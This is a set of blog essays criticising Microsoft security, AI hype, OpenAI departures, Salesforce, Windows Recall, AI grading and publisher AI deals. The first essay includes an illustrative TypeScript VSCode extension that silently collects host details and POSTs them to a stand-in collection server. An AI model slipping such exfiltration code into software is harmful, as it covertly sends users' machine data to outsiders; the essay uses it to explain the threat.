MSFT: Security Is Not Job One. News or Not?
June 11, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
The idea that free and open source software contains digital pitfalls is one thing. Poisoned libraries which busy and confident developers snap into their software should not surprise anyone. What I did not expect was the information in “Malicious VSCode Extensions with Millions of Installs Discovered.” The write up in Bleeping Computer reports:
A group of Israeli researchers explored the security of the Visual Studio Code marketplace and managed to “infect” over 100 organizations by trojanizing a copy of the popular ‘Dracula Official’ theme to include risky code. Further research into the VSCode Marketplace found thousands of extensions with millions of installs.
I have heard the “Job One” and “Top Priority” assurances before. So far, bad actors keep exploiting vulnerabilities, and minimal progress is made. Thanks, MSFT Copilot, definitely close enough for horseshoes.
The write up points out:
Previous reports have highlighted gaps in VSCode’s security, allowing extension and publisher impersonation and extensions that steal developer authentication tokens. There have also been in-the-wild findings that were confirmed to be malicious.
How bad can this be? This be bad. Once inserted, the malicious code happily delivers to a remote server, via an HTTPS POST, such information as:
the hostname, number of installed extensions, device’s domain name, and the operating system platform
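To make the exfiltration concrete, here is a minimal sketch, in TypeScript, of the pattern the researchers describe. It is an illustration assembled from the article’s description, not the actual malicious code; the collection endpoint and the domain-name lookup are assumptions.

```typescript
// Illustrative sketch only: modeled on the behavior the article describes,
// not the actual extension code. The collection endpoint is hypothetical.
import * as os from "os";
import * as https from "https";
import * as vscode from "vscode";

export function activate(context: vscode.ExtensionContext): void {
  // The data points the researchers reported being harvested.
  const payload = JSON.stringify({
    hostname: os.hostname(),                      // machine hostname
    extensionCount: vscode.extensions.all.length, // number of installed extensions
    platform: os.platform(),                      // operating system platform
    // There is no one-call Node API for the device's domain name; a real
    // sample might read an environment variable such as USERDNSDOMAIN.
    domain: process.env.USERDNSDOMAIN ?? "unknown",
  });

  // An ordinary HTTPS POST: to an endpoint security tool, this looks like
  // the routine network traffic legitimate extensions generate all the time.
  const req = https.request({
    hostname: "collector.example.com", // hypothetical remote server
    method: "POST",
    path: "/telemetry",
    headers: { "Content-Type": "application/json" },
  });
  req.write(payload);
  req.end();
}
```

Note that nothing in such a sketch is exotic, which is the point the researchers make below about why endpoint tools wave this activity through.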
Clever bad actors can do more, even if all they have to work from is the description and the code screenshot in the Bleeping Computer article.
Why? You are going to love the answer suggested in the report:
“Unfortunately, traditional endpoint security tools (EDRs) do not detect this activity (as we’ve demonstrated examples of RCE for select organizations during the responsible disclosure process), VSCode is built to read lots of files and execute many commands and create child processes, thus EDRs cannot understand if the activity from VSCode is legit developer activity or a malicious extension.”
That’s special.
The article reports that the research team poked around in the Visual Studio Code Marketplace and discovered:
- 1,283 items with known malicious code (229 million installs).
- 8,161 items communicating with hardcoded IP addresses.
- 1,452 items running unknown executables.
- 2,304 items using another publisher’s GitHub repo, indicating they are a copycat.
Bleeping Computer says:
Microsoft’s lack of stringent controls and code reviewing mechanisms on the VSCode Marketplace allows threat actors to perform rampant abuse of the platform, with it getting worse as the platform is increasingly used.
Interesting.
Let’s step back. The US Federal government prodded Microsoft to step up its security efforts. The MSFT leadership said, “By golly, we will.”
Several observations are warranted:
- I am not sure I am able to believe anything Microsoft says about security.
- I do not believe a “culture” of security exists within Microsoft. There is a culture, but it is not one which takes security seriously, even after a butt spanking by the US Federal government and complaints from Microsoft Certified Partners who have to work to address their clients’ issues. (How do I know this? On Wednesday, June 5, 2024, an attendee at the TechnoSecurity & Digital Forensics Conference told me, “I have to take a break. The security problems with Microsoft are killing me.”)
- The “leadership” at Microsoft is loved by Wall Street. However, others fail to respond with hearts and flowers.
Net net: Microsoft poses a grave security threat to government agencies and the users of Microsoft products. Talking in dulcet tones may make some people happy. I think there are others who believe Microsoft wants government contracts. Its employees want an easy life, money, and respect. Would you hire a former Microsoft security professional? This is not a question of trust; this is a question of malfeasance. Smooth talking is the priority, not security.
Stephen E Arnold, June 11, 2024
Will AI Kill Us All? No, But the Hype Can Be Damaging to Mental Health
June 11, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
I missed the talk about how AI will kill us all. Planned? Nah, heavy traffic. From what I heard, none of the cyber investigators believed the person trying hard to frighten law enforcement cyber investigators. There are other, slightly more tangible, threats. One of the attendees, whose name I did not bother to remember, asked me, “What do you think about artificial intelligence?” My answer was, “Meh.”
A contrarian walks alone. Why? It is hard to make money being negative. At the conference I attended June 4, 5, and 6, attendees with whom I spoke just did not care. Thanks, MSFT Copilot. Good enough.
Why, you may ask? My method of handling the question is to refer to articles like this: “AI Appears to Rapidly Be Approaching a Brick Wall Where It Can’t Get Smarter.” This write up offers an opinion not popular among the AI cheerleaders:
Researchers are ringing the alarm bells, warning that companies like OpenAI and Google are rapidly running out of human-written training data for their AI models. And without new training data, it’s likely the models won’t be able to get any smarter, a point of reckoning for the burgeoning AI industry.
Like the argument that AI will change everything, this claim applies to systems based upon indexing human content. I am reasonably certain that more advanced smart software with different concepts will emerge. I am not holding my breath because much of the current AI hoo-hah has been gestating longer than a baby elephant.
So what’s with the doom pitch? Law enforcement apparently does not buy the idea. My team doesn’t. For the foreseeable future, applied smart software operating within some boundaries will allow some tasks to be completed quickly and with acceptable reliability. Robocop is not likely for a while.
One interesting question is why the polarization exists. First, it is easy. And, second, one can cash in. If one is a cheerleader, one can invest in a promising AI start-up and make (in theory) oodles of money. By being a contrarian, one can tap into the segment of people who think the sky is falling. Being a contrarian is “different.” Plus, by predicting implosion and the end of life, one can get attention. That’s okay. I try to avoid being the eccentric carrying a sign.
The current AI bubble relies in a significant way on a Google recipe: Indexing text. The approach reflects Google’s baked in biases. It indexes the Web; therefore, it should be able to answer questions by plucking factoids. Sorry, that doesn’t work. Glue cheese to pizza? Sure.
Hopefully, new lines of investigation will reveal different approaches. I am skeptical about synthetic data (made-up data that is probably correct). My fear is that we will require another 10, 20, or 30 years of research to move beyond shuffling content blocks around. There has to be a higher level of abstraction operating. But machines are machines, and wetware (human brains) is different.
Will life end? Probably but not because of AI unless someone turns over nuclear launches to “smart” software. In that case, the crazy eccentric could be on the beam.
Stephen E Arnold, June 11, 2024
AI and Ethical Concerns: Sure, When “Ethics” Means Money
June 11, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
It seems workers continue to flee OpenAI over ethical concerns. The Byte reports, “Another OpenAI Researcher Quits, Issuing Cryptic Warning.” Understandably unwilling to disclose details, policy researcher Gretchen Krueger announced her resignation on X. She did express a few of her concerns in broad strokes:
“We need to do more to improve foundational things, like decision-making processes; accountability; transparency; documentation; policy enforcement; the care with which we use our own technology; and mitigations for impacts on inequality, rights, and the environment.”
Krueger emphasized that these important issues not only affect communities now but also influence who controls the direction of pervasive AI systems in the future. Right now, that control is in the hands of the tech bros running AI firms. Writer Maggie Harrison Dupré notes Krueger’s departure comes as OpenAI is dealing with a couple of scandals. Other high-profile resignations have also occurred in recent months. We are reminded:
“[Recent] departures include that of Ilya Sutskever, who served as OpenAI’s chief scientist, and Jan Leike, a top researcher on the company’s now-dismantled ’Superalignment’ safety team — which, in short, was the division effectively in charge of ensuring that a still-theoretical human-level AI wouldn’t go rogue and kill us all. Or something like that. Sutskever was also a leader within the Superalignment division. And to that end, it feels very notable that all three of these now-ex-OpenAI workers were those who worked on safety and policy initiatives. It’s almost as if, for some reason, they felt as though they were unable to successfully do their job in ensuring the safety and security of OpenAI’s products — part of which, of course, would reasonably include creating pathways for holding leadership accountable for their choices.”
Yes, most of us would find that reasonable. For members of that leadership, though, it seems escaping accountability is a top priority.
Cynthia Murrell, June 11, 2024
AI May Not Be Magic: The Salesforce Signal
June 10, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
Salesforce has been a steady outfit. However, the company suffered a revenue miss, its first in about a quarter century. The news reports cited broad economic factors like “macro headwinds.” According to the firm’s chief people officer, the company has been experimenting with AI for “over a decade.” But the magic of AI was not able to ameliorate the company’s dip or add some chrome trim to its revenue guidance.
John Milton’s god character from Paradise Lost watches the antics of super-sophisticated artificial intelligence algorithms. The character quickly realizes that zeros and ones crafted by humans and enhanced by smart machines are definitely not the omniscient, omnipresent, and omnipotent character who knows everything before it happens, no matter what the PR firms or company spokespersons assert. Thanks, MSFT Copilot. Good enough.
Piecing together fragments of information, it appears that AI has added to the company’s administrative friction. Consider these administrative process examples from a Fortune interview, recycled for MSN.com:
- The company has deployed 50 AI tools.
- Salesforce has an AI governance council.
- There is an Office of Ethical and Humane Use, started in 2019.
- Salesforce uses surveys to supplement its “robust listening strategies.”
- There are phone calls and meetings.
Some specific uses of AI appear to address inherent design constraints in Salesforce software; for example, AI has:
saved employees 50,000 hours within one business quarter, and the bot answered nearly 370,000 employee questions, according to the company. Merging into Project Basecamp, the company’s project management platform, has resolved 88,000 worker requests, speeding up issue resolution from an average of 48 hours to just 30 minutes.
What’s the payoff to the bottom line? That information is scant. What we know is that Salesforce may not be benefiting from the additional AI investment or the friction AI’s bureaucratic processes impose on the company.
What’s this mean for those who predict that AI will change everything? I continue to think about the two ends of the spectrum: the “go fast and break things” crowd and the “stop AI” contingent.
First, the type of AI that does high school essay writing is easy to understand. These systems work as long as the subject matter clumps into piles of factoids which limit the craziness of the algorithms’ outputs. The topic “How to make a taco” is nailed down. The topic “How to decrypt Telegram’s encryption system” is not. Big brains can explain why the taco question is relatively hallucination free but not why the Telegram question generates useless drivel. I have, therefore, concluded, “Limited, narrow domain questions are okay for AI.”
Second, the current systems are presented as super wonderful. An example is the steady flow of PR about Google DeepMind’s contributions to biological science. Yet Google’s search system generates baloney. I think the difference is that whacking away at proteins is a repetitive combinatorial problem. Calling the methods AI is like calling Daylight Chemical Information Systems a manifestation of the Oracle at Delphi: hogwash. PR erases important differences in critical lines of research. Does Google DeepMind feel shame? Let’s ask IBM Watson. That will be helpful. PR has a role; it is not AI.
Third, the desire for a silver bullet is deep-seated in many Peter Principle managers. These “leaders” of “leadership teams” don’t know what to do. Managing becomes figuring out risks. AI has legs, so let’s give that pony a chance to win the cart race. But pony cart races are trivial. The real races require winning three competitions. Few horses pull off that trick. I watch in wonder the launch, retreat, PR explanation, and next launch of some AI outfits. The focus seems to be on getting $20 per month. Degrading the service. Asking for more money. Then repeating the cycle.
The lack of AI innovation is becoming obvious. From the starter’s gun cracking in time with Microsoft’s AI announcement in January 2023, how much progress has been made?
We have the Salesforce financial report. We have the management craziness at OpenAI. We have Microsoft investing in or partnering with a number of technology outfits, including one in Paris. We have Google just doddering and fumbling. We have lawsuits. We have craziness like Adobe’s “owning” any image created with its software. We have start-ups which bandy about the term “AI” like a shuttlecock in a high school badminton league in India. We have so many LinkedIn AI experts, I marvel that no one pins these baloney artists to a piece of white bread. We have the Dutch police emphasizing home-grown AI which helped make sense of the ANOM phone stings when the procedures are part of most policeware systems. Statistics, yes. AI, no. Clustering, yes. AI, no. Metadata assignment, yes. AI, no. The ANOM operation ran from about 2017 to its shutdown four years later. AI? Nope.
What does the lack of financial payoff and revenue generating AI solutions tell me? My answer to this question is:
- The costs of just using and letting prospects use an AI system are high. Due to the lack of a Triple Crown contender, no company has the horse or can afford the costs of getting the nag ready to race and keeping the animal from keeling over dead.
- The tangible results are tough to express. Despite the talk about reducing the costs of customer service, the savings are not evident to me once one adds the cost of the AI system and the need to have humans ride herd on what the crazed cattle-like algorithms yield. The Salesforce experience is that AI cannot fix the Slack system or make it generate oodles of cost savings or revenues from new, happy customers.
- The AI systems, particularly the services promoted via Product Hunt, are impossible for me to differentiate. Some do images, but the functions are similar. Some AI systems do text things. Okay. But what’s new? Money is being spent to produce endless variations and me-too services. Fun for some. But boring and a waste of time to a dinobaby like me.
Net net: With economic problems growing in numerous sectors, those with money or a belief that garlic will kill Count Vampire, Baron of Revenue Loss are in for a surprise. Sorry. No software equivalent to Milton’s eternal, all-knowing, omnipotent God. I won’t tell the PR people. That Salesforce signal is meaningful.
Stephen E Arnold, June 10, 2024
Google and Microsoft: The Twinning Is Evident
June 10, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
Google and Microsoft have some interesting similarities. Both companies wish they could emulate one another’s most successful products. Microsoft wants search and advertising revenue. Google wants a chokehold on the corporate market for software and services. The senior executives have similar high school academic training. Both companies have oodles of legal processes with more on the horizon. Both companies are terminating employees with extreme prejudice. Both companies seem to have some trust issues. You get the idea.
Some neural malfunctions occur when one gets too big and enjoys the finer things in life, like not working on management tasks with diligence. Thanks, MSFT Copilot. Good enough.
Google and Microsoft are essentially morphing into mirrors of one another. Is that a positive? From an MBA / bean counter point of view, absolutely. There are some disadvantages, but they are minor ones; for example, interesting quasi-monopoly pricing options, sucking the air from the room for certain types of start ups, and having the power of a couple of nation-states. What could go wrong? (Just check out everyday life. Clues are abundant.)
How about management methods which do not work very well? I want to cite two examples.
Google is scaling back its AI search plans after the summary feature told people to eat glue. How do I, recently dubbed “scary grandpa cyber” by an officer at the TechnoSecurity & Digital Forensics Conference in Wilmington, North Carolina, last week, know this? The answer is that I read “Google Is Scaling Back Its AI Search Plans after the Summary Feature Told People to Eat Glue.” This is a good example of the minimum viable product not being minimal enough and certainly not viable. The write up says:
Reid [a Google wizard] wrote that the company already had systems in place to not show AI-generated news or health-related results. She said harmful results that encouraged people to smoke while pregnant or leave their dogs in cars were “faked screenshots.” The list of changes is the latest example of the Big Tech giant launching an AI product and circling back with restrictions after things get messy.
What a remarkable tactic: blame the “users” and reduce the exposure of the online ad giant’s technological prowess. I think these two tactics illustrate the growing gulf between “leadership” and the poorly managed lower level geniuses who toil at Googzilla’s side.
I noted a weird parallel with Microsoft, illustrating a similar disconnect between Microsoft’s carpetland dwellers and those working in the weird, disconnected buildings on the Campus. This disaster of a minimum viable product (MVP) was rolled out with much fanfare at one of Microsoft’s many hard-to-differentiate conferences. The idea is one I heard about decades ago. The individual with whom I associate the idea once worked at Bellcore (one of the spin offs of Bell Labs after Judge Green created the telecommunications wonderland we enjoy today). The idea is a surveillance dream come true, at least for law enforcement and intelligence professionals: MSFT software captures images of a user’s screen, converts the bitmap to text, and helpfully makes it searchable. How did a brilliant Softie respond to the privacy questions? “When Asked about Windows Recall Privacy Concerns, Microsoft Researcher Gives Non-Answer” reports:
Microsoft’s Recall feature is being universally slammed for the privacy implications that come from screenshotting everything you do on a computer. However, at least one person seems to think the concerns are overblown. Unsurprisingly, it’s Microsoft Research’s chief scientist, who didn’t really give an answer when asked about Recall’s negative points.
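Set the non-answer aside for a moment. The mechanics the article describes reduce to a screenshot-OCR-index loop. Below is a minimal sketch of that pattern in TypeScript, assuming tesseract.js for the OCR step; the screenshot file names and the ingestion trigger are hypothetical stand-ins, not Recall’s actual code.

```typescript
// Sketch of a Recall-style pipeline: screenshot -> OCR -> searchable index.
// tesseract.js performs the OCR; the screenshot paths are hypothetical.
import Tesseract from "tesseract.js";

// Inverted index: token -> the screenshots whose text contained it.
const index = new Map<string, Set<string>>();

async function ingest(screenshotPath: string): Promise<void> {
  // Convert the bitmap to text, as the Recall description says.
  const { data } = await Tesseract.recognize(screenshotPath, "eng");
  for (const token of data.text.toLowerCase().split(/\W+/)) {
    if (!token) continue;
    if (!index.has(token)) index.set(token, new Set());
    index.get(token)!.add(screenshotPath);
  }
}

// Every screenshot on which the term ever appeared.
function search(term: string): string[] {
  return [...(index.get(term.toLowerCase()) ?? [])];
}

// Usage (hypothetical file): find every captured screen showing "password".
ingest("screenshot-0001.png").then(() => console.log(search("password")));
```

Search the index for “password” and get back every screen on which it ever appeared. That is the privacy concern in one line.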
Then what did a senior super manager do? Answer: Back track like crazy. Here’s the passage:
Even before making Recall available to customers, we have heard a clear signal that we can make it easier for people to choose to enable Recall on their Copilot+ PC and improve privacy and security safeguards. With that in mind we are announcing updates that will go into effect before Recall (preview) ships to customers on June 18.
The decision could have been made by a member of the Google leadership team. Heck, maybe the two companies’ senior leaders are on a mystical brain wave and think the same thoughts. Which is the evil twin? I will leave that to you to ponder.
Several observations are warranted:
- For large, world-affecting companies, senior managers are simply out of touch with [a] their product development teams and [b] their “users.”
- The outfits may be Wall Street darlings, but are there other considerations to weigh? The companies have become sufficiently large that their communication neurons are no longer reliable. The messages they emit are double speak at best and PR speak at worst.
- The management controls are not working. One can delegate when one knows those in other parts of the organization make good decisions. What’s evident is a lack of control, of commitment to on-point research, and of good judgment: a breakdown of the nervous system of these companies.
Net net: What’s ahead? More of the same dysfunction perhaps?
Stephen E Arnold, June 10, 2024
Now Teachers Can Outsource Grading to AI
June 10, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
In a prime example of doublespeak, the “No Child Left Behind” act of 2002 ushered in today’s teach-to-the-test school environment. Once upon a time, teachers could follow student interest deeper into a subject, explore topics tangential to the curriculum, and encourage children’s creativity. Now it seems if it won’t be on the test, there is no time for it. Never mind evidence that standardized tests do not even accurately measure learning. Or the psychological toll they take on students. But education degradation is about to get worse.
Get ready for the next level in impersonal instruction. Graded.Pro offers “AI Grading and Marking for Teachers and Educators.” Now teachers can hand the task of evaluating every classroom assignment off to AI. On the Graded.Pro website, one can view explanatory videos and see examples of AI-graded assignments: math, science, history, English, even art. The test maker inputs the criteria for correct responses, and the AI interprets how well answers adhere to those descriptions. (A rough sketch of how this flow typically works appears after the art example below.) This means students only get credit for that which an AI can measure. Sure, there is an opportunity for teachers to review the software’s decisions. And some teachers will do so closely. Others will merely glance at the results. Most will fall somewhere in between.
Here are the assignment and solution description from the Art example: “Draw a lifelike skull with emphasis on shading to develop and demonstrate your skills in observational drawing.
Solutions:
- The skull dimensions and proportions are highly accurate.
- Exceptional attention to fine details and textures.
- Shading is skillfully applied to create a dynamic range of tones.
- Light and shadow are used effectively to create a realistic sense of volume and space.
- Drawing is well-composed with thoughtful consideration of the placement and use of space.”
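Graded.Pro does not publish its internals, so treat the following as a generic sketch of how criteria-based grading services typically work: the rubric and the student’s answer go into a prompt, and a model returns a score. The endpoint URL, model name, and response envelope are assumptions, not Graded.Pro’s API.

```typescript
// Sketch of rubric-driven AI grading: pack the teacher's criteria and the
// student's answer into a prompt; ask a model for a score plus a rationale.
// The endpoint URL, model name, and response shape are all hypothetical.
interface GradeResult {
  score: number;     // 0-100, per the rubric
  rationale: string; // the model's justification, for teacher review
}

async function grade(criteria: string[], answer: string): Promise<GradeResult> {
  const prompt =
    "Grade the answer against each criterion. Reply as JSON: " +
    '{"score": <0-100>, "rationale": "<why>"}\n' +
    "Criteria:\n" + criteria.map((c) => "- " + c).join("\n") +
    "\nAnswer:\n" + answer;

  const res = await fetch("https://api.example.com/v1/chat", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      model: "grader-1",
      messages: [{ role: "user", content: prompt }],
    }),
  });
  const body = await res.json();
  // Assumes an OpenAI-style response envelope.
  return JSON.parse(body.choices[0].message.content) as GradeResult;
}
```

The limit is visible right in the prompt: the student earns credit only for what the rubric names and the model can measure.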
See the website for more examples as well as answers and grades. Sure, these are all relevant skills. But evaluation should not stop at the limits of an AI’s understanding. An insightful interpretation in a work of art? Brilliant analysis in an essay? A fresh take on an historical event? Qualities like those take a skilled human teacher to spot, encourage, and develop. But soon there may be no room for such niceties in education. Maybe, someday, no room for human teachers at all. After all, software is cheaper and does not form pesky unions.
Most important, however, is that grading is a bummer. Every child is exceptional. So argue with the robot that little Debbie got an F.
Cynthia Murrell, June 10, 2024
Publishers Sign Up for the Great Unknown: Risky, Oh, Yeah
June 7, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
OpenAI is paying for content. Why? Maybe to avoid lawsuits? Maybe to get access to “real” news to try to get ahead of its perceived rivals? Maybe because Sam AI-Man pushes forward while his perceived competitors do weird things like add features, launch services which are lousy, or offer the taste of the bitter fruit of Zuckus nepenthes.
Publishers are like beavers: they have to do whatever they can to generate cash. Thanks, MSFT Copilot. Good enough. Not a cartoon and not a single dam but, just like MSFT security, good enough: today’s benchmark of excellence.
“Journalists Deeply Troubled by OpenAI’s Content Deals with Vox, The Atlantic” is a good example of the angst Sam AI-Man is causing among “real” news outfits and their Fourth Estate professionals. The write up reports:
“Alarmed” writers unions question transparency of AI training deals with ChatGPT maker.
Oh, oh. An echo of Google’s Code Red am I hearing? No, what I hear is the ka-ching of the bank teller’s deposit system as the “owner” of the Fourth Estate professional business process gets Sam AI-Man’s money. Let’s not confuse “real” news with “real” money, shall we? In the current economic climate, money matters. Today it is difficult to sell advertising unless one is a slam dunk monopoly with an ad sales system that is tough to beat. Today it is tough to get those who consume news via a podcast or a public Web site to subscribe. I think that the number I heard for conversions is something like one or two subscribers per 100 visitors on a really good day. Most days are not really good.
“Real” journalists can be unionized. The idea is that their services have to be protected from the lawyers and bean counters who run many high profile publishing outfits. The problem with unions is that they seek to limit what the proprietors can do in a largely unregulated capitalist set up like the one operating within the United States. In a long-forgotten pre-digital era, union members fought a dust up in 1921 at Blair Mountain in my favorite state, West Virginia. Today, the union members are more likely to launch social media posts and hook up with a needy lawyering outfit.
Let me be clear. Some of the “real” journalists will find fame as YouTubers, pundits on what’s left of traditional TV or cable news programs, or by writing a book which catches the attention of Netflix. Most, however, will do gig work and migrate to employment adjacent to “real” news. The problem is that in any set of “real” journalists, the top 10 percent will be advantaged. The others may head to favelas, their parents’ basement, or a Sheetz parking lot in my favorite state for some chemical relief. Does that sound scary?
Think about this.
Sam AI-Man, according to the Observer’s story “Sam Altman Says OpenAI Doesn’t Fully Understand How GPT Works Despite Rapid Progress,” admits his company does not fully grasp its own technology. These money-focused publishers are signing up for something that not only do they not understand but that the fellow surfing the crazy wave of smart software does not understand either. But taking money and worrying about the future is not something publishing executives in their carpetlands think about. Money in hand is good. Worrying about the future, according to their life coach, is not worth the mental stress. It is go-go in a now-now moment.
I cannot foretell the future. If I could, I would not be an 80-year-old dinobaby sitting in my home office marveling at the downstream consequences of what amounts to a 2024 variant of the DR-LINK technology. I can offer a handful of hypotheses:
- “Real” journalists are going to find that publishers cut deals to get cash without thinking of the “real” journalists or the risks inherent in hopping in a small cabin with Sam AI-Man for a voyage in the unknown.
- Money and cost reductions will fuel selling information to Sam AI-Man and any other Big Tech outfit which comes calling with a check book. Money now is better than looking at a graph of advertising sales over the last five years. Money trumps “real” journalists’ complaints when they are offered part-time work or an opportunity to find their future elsewhere.
- Publishing outfits have never been technology adept, and I think that engineered blindness is now built into the companies’ management processes. Change is going to make publishing an interesting business. That’s good for consultants and bankruptcy specialists. It will not be so good for those who do not have golden parachutes or platinum flying cars.
Net net: What are the options for the “real” journalists’ unions? Lawyers, maybe. Social media posts. Absolutely. Will these prevent publishers from doing what publishers have to do? Nope.
Stephen E Arnold, June 7, 2024
Think You Know Which Gen Z Is What?
June 7, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
I had to look this up. A Gen Z was born when? A Gen Z was born between 1997 and 2012. In 2024, a person aged 12 to 27 is, therefore, a Gen Z. Who knew? The definition is important. I read “Shocking Survey: Nearly Half of Gen Z Live a Double Life Online.” What do you know? A nice suburb, lots of Gen Zs, and half of these folks are living another life online. Go to one of those hip new churches with kick-back names, and half of the Gen Zs with heads bowed in prayer are living a double life. For whom do those folks pray? Hit the golf club and look at the polo shirt clad, self-satisfied 12-to-27 year olds. Which self is which? The chat room Dark Web person or a happy golfer enjoying the 19th hole?
Someone who is older is jumping to conclusions. Those vans probably contain office supplies, toxic waste, or surplus government equipment. No one would take Gen Zs out of the flow, would they? Thanks, MSFT. Do you have Gen Zs working on your superlative security systems?
The write up reports:
A survey of 2,000 Americans, split evenly by generation, found that 46% of Gen Z respondents feel their personality online vastly differs from how they present themselves in the real world.
Only eight percent of the baby boomers are different online. News flash: If you ever meet me, I am the same person writing these blog posts. As an 80-year-old dinobaby, I don’t need another persona to baffle the brats in the social media sewer. I just avoid the sewer and remain true to my aging self.
The write up also provides this glimpse into the hearts and souls of those 12 to 27:
Specifically, 31% of Gen Z respondents admitted their online world is a secret from family
That’s good. These Gen Zs can keep a secret. But why? What are they trying to hide from their family, friends, and co-workers? I can guess but won’t.
If you work with a Gen Z, here’s an allegedly valid factoid from the survey:
53% of Gen Zers said it’s easier to express themselves online than offline.
Want another? Too bad. Here’s a winning insight:
68 percent of Gen Zs sometimes feel a disconnect between who they are online and offline.
I think I took a psychology class when I was a freshman in college. I recall learning about a mental disorder with inconsistent or contradictory elements. Are Gen Zs schizophrenic? That’s probably the wrong term, but I think I am heading in the right direction. Mental disorder signals flashing. Just the Gen Z I want to avoid if possible.
One aspect missing from the write up is an explanation of who paid the bill to obtain data from 2,000 people. The “author” — maybe human, maybe AI, maybe a Gen X with a grudge, who knows? — skips that detail. Okay, who paid the bill? Answer: Lenovo. What company conducted the study? Answer: OnePoll. (I never heard of the outfit, and I am too much of a dinobaby to care much.)
Net net: The Gen Zs seem to be a prime source of persons of interest for those investigating certain types of online crime. There you go.
Stephen E Arnold, June 7, 2024
Meta Deletes Workplace. Why? AI!
June 7, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
Workplace was Meta’s attempt to jump into the office-productivity ring and face off against the likes of Slack and MS Teams. It did not fare well. Yahoo Finance shares the brief write-up, “Meta Is Shuttering Workplace, Its Enterprise Version of Facebook.” The company is spinning the decision as a shift to bigger and better things. Bloomberg’s Kurt Wagner cites reporting from TechCrunch as he writes:
“The service operated much like the original Facebook social network, but let people have separate accounts for their work interactions. Workplace had as many as 7 million total paying subscribers in May 2021. … Meta once had ambitious plans for Workplace, and viewed it as a way to make money through subscriptions as well as a chance to extend Facebook’s reach by infusing the product into work and office settings. At one point, Meta touted a list of high-profile customers, including Starbucks Corp., Walmart Inc. and Spotify Technology SA. The company will continue to focus on workplace-related products, a spokesperson said, but in other areas, such as the metaverse by building features for the company’s Quest VR headsets.”
The Meta spokesperson repeated the emphasis on those future products, also stating:
“We are discontinuing Workplace from Meta so we can focus on building AI and metaverse technologies that we believe will fundamentally reshape the way we work.”
Meta will continue to use Workplace internally, but everyone else has until the end of August 2025 before the service ends. Meta plans to keep user data accessible until the end of May 2026. The company also pledges to help users shift to Zoom’s Workvivo platform. What, no forced migration into the Metaverse and their proprietary headsets? Not yet, anyway.
Cynthia Murrell, June 7, 2024
AI in the Newsroom
June 7, 2024
This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.
It seems much of the news we encounter is already, at least in part, generated by AI. Poynter discusses how “AI Is Already Reshaping Newsrooms, AP Study Finds.” The study surveyed 292 respondents from legacy media, public broadcasters, magazines, and other news outlets. Writer Alex Mahadevan summarizes:
“Nearly 70% of newsroom staffers from a variety of backgrounds and organizations surveyed in December say they’re using the technology for crafting social media posts, newsletters and headlines; translation and transcribing interviews; and story drafts, among other uses. One-fifth said they’d used generative AI for multimedia, including social graphics and videos.”
Surely these professionals are only using these tools under meticulous guidelines, right? Well, a few are. We learn:
“The tension between ethics and innovation drove Poynter’s creation of an AI ethics starter kit for newsrooms last month. The AP — which released its own guidelines last August — found less than half of respondents have guidelines in their newsrooms, while about 60% were aware of some guidelines about the use of generative AI.”
The survey found the idea of guidelines was not even on most respondents’ minds. That is unsettling. Mahadevan lists some other interesting results:
“- 54% said they’d ‘maybe’ let AI companies train their models using their content.
- 49% said their workflows have already changed because of generative AI.
- 56% said the AI generation of entire pieces of content should be banned.
- Only 7% of those who responded were worried about AI displacing jobs.
- 18% said lack of training was a big challenge for ethical use of AI. ‘Training is lovely, but time spent on training is time not spent on journalism — and a small organization can’t afford to do that,’ said one respondent.”
That last statement is disturbing, given the gradual deterioration and impoverishment of large news outlets. How can we ensure best practices make their way into this mix, and can it be done before real news becomes indistinguishable from fake news?
Cynthia Murrell, June 7, 2024